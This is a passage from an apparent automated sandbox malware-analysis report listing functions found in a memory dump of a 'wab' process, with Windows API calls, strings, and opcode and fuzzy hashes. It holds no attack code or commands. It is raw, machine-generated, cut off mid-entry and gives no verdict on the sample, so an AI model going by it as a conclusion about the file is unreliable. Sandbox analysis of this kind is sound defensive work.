                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                    Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                    • API String ID: 3510742995-2446657581
                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                    Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                    • memset.MSVCRT ref: 00405ABB
                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                    • SetFocus.USER32(?), ref: 00405B76
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$FocusItemmemset
                    • String ID:
                    • API String ID: 4281309102-0
                    • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                    • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                    Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintfwcscat
                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                    • API String ID: 384018552-4153097237
                    • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                    • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                    Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ItemMenu$CountInfomemsetwcschr
                    • String ID: 0$6
                    • API String ID: 2029023288-3849865405
                    • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                    • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                    Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                    • memset.MSVCRT ref: 00405455
                    • memset.MSVCRT ref: 0040546C
                    • memset.MSVCRT ref: 00405483
                    • memcpy.MSVCRT ref: 00405498
                    • memcpy.MSVCRT ref: 004054AD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$memcpy$ErrorLast
                    • String ID: 6$\
                    • API String ID: 404372293-1284684873
                    • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                    • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                    Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                    Download Yara Rule
                    APIs
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                    • wcscpy.MSVCRT ref: 0040A0D9
                    • wcscat.MSVCRT ref: 0040A0E6
                    • wcscat.MSVCRT ref: 0040A0F5
                    • wcscpy.MSVCRT ref: 0040A107
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                    • String ID:
                    • API String ID: 1331804452-0
                    • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                    • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                    Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                    • String ID: advapi32.dll
                    • API String ID: 2012295524-4050573280
                    • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                    • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                    Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • <%s>, xrefs: 004100A6
                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                    • <?xml version="1.0" ?>, xrefs: 0041007C
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$_snwprintf
                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                    • API String ID: 3473751417-2880344631
                    • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                    • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                    Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscat$_snwprintfmemset
                    • String ID: %2.2X
                    • API String ID: 2521778956-791839006
                    • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                    • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                    Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintfwcscpy
                    • String ID: dialog_%d$general$menu_%d$strings
                    • API String ID: 999028693-502967061
                    • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                    • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                    Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memsetstrlen
                    • String ID:
                    • API String ID: 2350177629-0
                    • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                    • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                    Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                    • API String ID: 2221118986-1606337402
                    • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                    • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                    Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                    • String ID:
                    • API String ID: 265355444-0
                    • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                    • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                    Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                      • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                    • memset.MSVCRT ref: 0040C439
                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                    • _wcsupr.MSVCRT ref: 0040C481
                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                    • memset.MSVCRT ref: 0040C4D0
                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                    • String ID:
                    • API String ID: 1973883786-0
                    • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                    • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                    Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004116FF
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                      • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                      • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                    • API String ID: 2618321458-3614832568
                    • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                    • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                    Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004185FC
                    • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@AttributesFilememset
                    • String ID:
                    • API String ID: 776155459-0
                    • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                    • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                    Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                    • malloc.MSVCRT ref: 00417524
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                    • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                    • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                    • String ID:
                    • API String ID: 2308052813-0
                    • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                    • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                    • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                    Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                    • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                    • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: PathTemp$??3@
                    • String ID: %s\etilqs_$etilqs_
                    • API String ID: 1589464350-1420421710
                    • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                    • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                    • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                    • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                    Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040FDD5
                      • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                    • _snwprintf.MSVCRT ref: 0040FE1F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                    • String ID: <%s>%s</%s>$</item>$<item>
                    • API String ID: 1775345501-2769808009
                    • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                    • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                    • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                    • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                    Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                    Download Yara Rule
                    APIs
                    • wcscpy.MSVCRT ref: 0041477F
                    • wcscpy.MSVCRT ref: 0041479A
                    • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                    • CloseHandle.KERNEL32(00000000), ref: 004147C8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: wcscpy$CloseCreateFileHandle
                    • String ID: General
                    • API String ID: 999786162-26480598
                    • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                    • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                    Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ErrorLastMessage_snwprintf
                    • String ID: Error$Error %d: %s
                    • API String ID: 313946961-1552265934
                    • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                    • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                    • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                    • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                    Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: foreign key constraint failed$new$oid$old
                    • API String ID: 0-1953309616
                    • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                    Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                    • API String ID: 3510742995-272990098
                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                    Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                    Download Yara Rule
                    APIs
                    Strings
